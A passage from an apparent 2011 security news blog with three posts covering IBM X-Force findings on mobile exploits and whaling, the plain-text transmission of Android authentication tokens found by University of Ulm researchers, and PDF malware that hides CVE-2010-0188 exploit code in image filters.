Add to that the fact that more people are storing more information worth stealing on their phones — including corporate information, since more smartphones and tablets are appearing in the workplace — and you have a perfect storm for criminally focused mobile hacking. The X-Force Mid-Year Trend and Risk Report, released today, is based on data gathered through IBM’s research of public vulnerability disclosures as well as the team’s monitoring and analysis of around 12 billion security events daily since the beginning of the year.
Among the report’s findings is the fact that in 2011, mobile users will experience twice the number of mobile exploit releases than last year. Much of this is due to the fact that, as X-Force researchers observed, “many mobile phone vendors do not rapidly push out security updates for their devices.”

The report urges consumers to be cautious about downloading apps that don’t come from an official app store. Third-party app stores or off-market apps are more likely than officially sanctioned apps to contain malicious (and highly monetizable) software.


Cross gives these six tips for consumers to protect themselves from the threat of a mobile attack:-

  • Make sure you protect access to your phone with a password or PIN to keep intruders out if your phone is lost or stolen.
  • Don’t download applications from third-party application markets.
  • Make sure you install system updates as prompted.
  • Back up your data on a regular basis.
  • Have the ability to track your phone and remotely wipe all its data if it is stolen. You can easily find an app that will allow you to do so.
  • Download and run anti-malware applications.

The X-Force team said the number of critical, non-mobile security vulnerabilities has tripled in 2011, and researchers particularly noted the practice of “whaling.” As opposed to “phishing,” a technique that casts a wide net to capture sensitive information, whaling implies that the criminal or criminals behind the attack are zeroing in on a “big fih,” a high-profile target. Phishing has lately been on the decline, but whaling, which targets those positioned in high levels of an organization with access to critical data, is on the rise.


“Although we understand how to defend against many of these attacks on a technical level, organizations don’t always have the cross-company operational practices in place to protect themselves,” said Cross.

Full commentary Report of Cross (IBM X-FORCE TEAM):-



-News Source (IBM X-Force Team & Mobile Beat)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Android handsets 'leak' personal data

Posted by Avik Sarkar On 5/17/2011 10:09:00 pm


More than 99% of Android phones are potentially leaking data that, if stolen, could be used to get the information they store online.
The data being leaked is typically used to get at web-based services such as Google Calendar.
The discovery was made by German security researchers looking at how Android phones handle identification information.
Google has yet to comment on the loophole uncovered by the researchers.
ID attack University of Ulm researchers Bastian Konings, Jens Nickels, and Florian Schaub made their discovery while watching how Android phones handle login credentials for web-based services.
Many applications installed on Android phones interact with Google services by asking for an authentication token - essentially a digital ID card for that app. Once issued the token removes the need to keep logging in to a service for a given length of time.
Sometimes, found the researchers, these tokens are sent in plain text over wireless networks. This makes the tokens easy to spot so criminals eavesdropping on the wi-fi traffic would be able to find and steal them, suggest the researchers.
Armed with the token, criminals would be able to pose as a particular user and get at their personal information.
Even worse, found the researchers, tokens are not bound to particular phones or time of use so they can be used to impersonate a handset almost anywhere.
"[T]he adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user," the researchers wrote in a blog post explaining their findings.
Abuse of the loophole might mean some people lose data but other changes may be harder to spot.
"...an adversary could change the stored e-mail address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business," the team speculated.
There is no suggestion that attackers are exploiting the Android loophole at the moment.
Almost all versions of the Android operating system were passing round unencrypted authentication tokens, found the researchers. It was fixed in version 2.3.4 but, suggest Google figures, only 0.3% of Android phones are running this software.
Some Google services, such as image sharing site Picasa, are still using unencrypted authentication tokens that can be stolen, found the team.
The researchers urged Android phone owners to update their device to avoid falling victim to attacks via the loophole. Google is also known to be working with operators and handset makers to get updates to people faster than at present.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

PDF Malware Using New Tricks to Exploit Vulnerability

Posted by Avik Sarkar On 4/30/2011 03:06:00 am


Security researchers have identified a new trick in PDF files being sent as email attachments that obfuscate attack code by encoding it inside an image file.

Malicious PDF files are using a new trick to avoid detection by almost all major antivirus scanners on the market, according to security researchers. Researchers from Avast and Sophos independently noticed PDF files making the rounds in March that weren’t being flagged as malicious but had the ability to compromise a machine just by being opened. The originating address was often suspicious, and the attachments accompanied emails purporting to be an order receipt. The attachments themselves often had names containing the supposed order number.
When the attachments were opened under Adobe 8.1.1 or Adobe 9.3, the compromised computer would connect to a remote site and download malware, usually SpyEye, ZBot  or FakeAV, Paul Baccas, a senior threat researcher at Sophos Labs, wrote on the company’s Naked Security blog on April 15.
“The PDFs did not seem to be using any exploit that I could see and yet they were downloading malware,” wrote Baccas.
It turned out these files were using a new trick to re-exploit the CVE-2010-0188 vulnerability Adobe had patched over a year ago on Feb. 16, 2010, according to Baccas.
The exploit is specific to Reader and would not execute in Google Chrome’s PDF Plugin, Jiri Sejtko, a senior virus analyst and researcher at Avast Software, wrote on the company blog April 22. While that’s a good sign, Chrome generally asks users if it should open the file in Reader if it can’t display the file correctly. In this day and age, many users would likely say yes, making them vulnerable, according to Sejtko.
The PDF specifications allow several filters to be used on raw data, either singly or in conjunction with each other, Sejtko said. Anyone can create valid PDF files where the data uses five different filters, or even multiple layers of the same filter. This allows malware authors to embed malicious code deep inside the filters, out of reach of even the most aggressive scanner.
“Our parser was unable to get any suitable content that we could define as malicious,” Sejtko said.
Files exploiting this vulnerability normally use an XML file that contains the raw data for a TIFF image file containing highly obfuscated code, Baccas said. In this case, the attackers were using parameters to control how the filters operate and crafting the attack code embedded in the raw data to conform to these parameters.
The filter being used to encrypt the malicious code was also meant to be used only for black and white images. The exploit detected by Avast researchers combined two filters, one for text and one for images, to hide the payload.
“Who would have thought that a pure image algorithm might be used as a standard filter on any object stream?” Sejtko said. While the “bad guys” are building a specially crafted TIFF image file in the PDF files, the trick can be used to hide special JavaScript and font files, as well.
Compared to other attacks, this attack is seen in “only a very small number” of attacks, Sejtko said, but has also been used in targeted attacks. While the CVE-2010-0188 flaw has been closed in current versions of Adobe Reader, users on older and unpatched versions of the software remain vulnerable to these malicious PDF files.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search